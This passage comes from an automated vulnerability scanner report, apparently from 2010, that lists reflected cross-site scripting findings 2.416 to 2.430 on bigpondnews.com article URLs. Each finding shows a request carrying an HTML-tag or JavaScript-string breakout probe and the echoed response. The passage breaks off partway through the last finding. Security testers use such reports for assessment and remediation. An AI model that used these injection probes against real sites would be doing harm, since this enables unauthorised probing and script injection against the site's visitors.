<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Finance3c6bc';2d469c6535b';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.416. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50282"><a>96bbe631d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Finance50282"><a>96bbe631d4/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=A04EA8A14E2453D7383841AB2EF6D1B2; Path=/
Content-Language: en
Content-Length: 55094
Expires: Tue, 23 Nov 2010 03:34:12 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Finance50282"><a>96bbe631d4/1">
...[SNIP]...

2.417. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b102c"><a>0c60b0a8b0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/OddSpotb102c"><a>0c60b0a8b0c/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:14 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=D3B42B8F2EF6F73207F72FC9F04841F0; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:14 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/OddSpotb102c"><a>0c60b0a8b0c/1">
...[SNIP]...

2.418. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d9be'%3b9a1cad784f2 was submitted in the REST URL parameter 2. This input was echoed as 3d9be';9a1cad784f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/OddSpot3d9be'%3b9a1cad784f2/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:45 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=3587DAF9E886DFF37B24F07EB9157E79; Path=/
Content-Language: en
Content-Length: 55086
Expires: Tue, 23 Nov 2010 03:34:45 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='OddSpot3d9be';9a1cad784f2';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.419. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39793"%3b63f039517b8 was submitted in the REST URL parameter 2. This input was echoed as 39793";63f039517b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/OddSpot39793"%3b63f039517b8/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:40 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=B749F71185B5F0FF136FCFD0C1DCA4DF; Path=/
Content-Language: en
Content-Length: 55086
Expires: Tue, 23 Nov 2010 03:34:40 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "ODDSPOT39793";63F039517B8"
});
</script>
...[SNIP]...

2.420. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a505d'%3b1257035e122 was submitted in the REST URL parameter 2. This input was echoed as a505d';1257035e122 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Technologya505d'%3b1257035e122/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:47 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=D5934E03CDD285C19E0B61D7F0D2DC45; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:47 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Technologya505d';1257035e122';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.421. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 703ac"%3b8257a7f6be7 was submitted in the REST URL parameter 2. This input was echoed as 703ac";8257a7f6be7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Technology703ac"%3b8257a7f6be7/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:42 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=EE0FF455FB35502FC4A3392E878416BB; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:42 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TECHNOLOGY703AC";8257A7F6BE7"
});
</script>
...[SNIP]...

2.422. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e06f"><a>d510eda427 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Technology5e06f"><a>d510eda427/2010/11/23/Extraterrestrial_particles_discovered_542531.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:16 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=3169B5048F8D984019A373AE2DA3993F; Path=/
Content-Language: en
Content-Length: 55106
Expires: Tue, 23 Nov 2010 03:34:16 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Technology5e06f"><a>d510eda427/1">
...[SNIP]...

2.423. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef69a'%3ba0c859ce77d was submitted in the REST URL parameter 2. This input was echoed as ef69a';a0c859ce77d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Technologyef69a'%3ba0c859ce77d/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:24 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=17F832A20A6A78A2D3115499F367165F; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:35:24 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='Technologyef69a';a0c859ce77d';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.424. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 518b6"%3b720bdf3afc8 was submitted in the REST URL parameter 2. This input was echoed as 518b6";720bdf3afc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/Technology518b6"%3b720bdf3afc8/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:18 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=3EDB6D6320F57F0EE8C1270D10E6C076; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:35:18 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TECHNOLOGY518B6";720BDF3AFC8"
});
</script>
...[SNIP]...

2.425. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d5f"><a>db7ed93e8b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Technology36d5f"><a>db7ed93e8b5/2010/11/23/US_rocket_sent_into_space_542693.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:54 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=FBAB25FC17CDCFAFA4278A13DD235BC2; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:54 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Technology36d5f"><a>db7ed93e8b5/1">
...[SNIP]...

2.426. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e656"><a>33746008f1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStories9e656"><a>33746008f1a/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:04 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=9D0B79279B9CFDFE124D66436C05DC8B; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:04 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStories9e656"><a>33746008f1a/1">
...[SNIP]...

2.427. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f1c5'%3be61c15ecfb6 was submitted in the REST URL parameter 2. This input was echoed as 2f1c5';e61c15ecfb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories2f1c5'%3be61c15ecfb6/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:36 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=7872D8042ACDBB84613364C19CDE2E05; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:36 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStories2f1c5';e61c15ecfb6';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.428. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff80c"%3bac5cbfe6ab7 was submitted in the REST URL parameter 2. This input was echoed as ff80c";ac5cbfe6ab7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStoriesff80c"%3bac5cbfe6ab7/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:30 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=3254E0B9F64DBC796EC88107F1CD6BAF; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:30 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIESFF80C";AC5CBFE6AB7"
});
</script>
...[SNIP]...

2.429. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c5"><a>51ff1ff1fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStoriesc35c5"><a>51ff1ff1fdb/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:12 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=5B770BFDE6B4D1870490201E1044E8B8; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:12 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStoriesc35c5"><a>51ff1ff1fdb/1">
...[SNIP]...

2.430. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794aa"%3bf430d19dc1f was submitted in the REST URL parameter 2. This input was echoed as 794aa";f430d19dc1f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

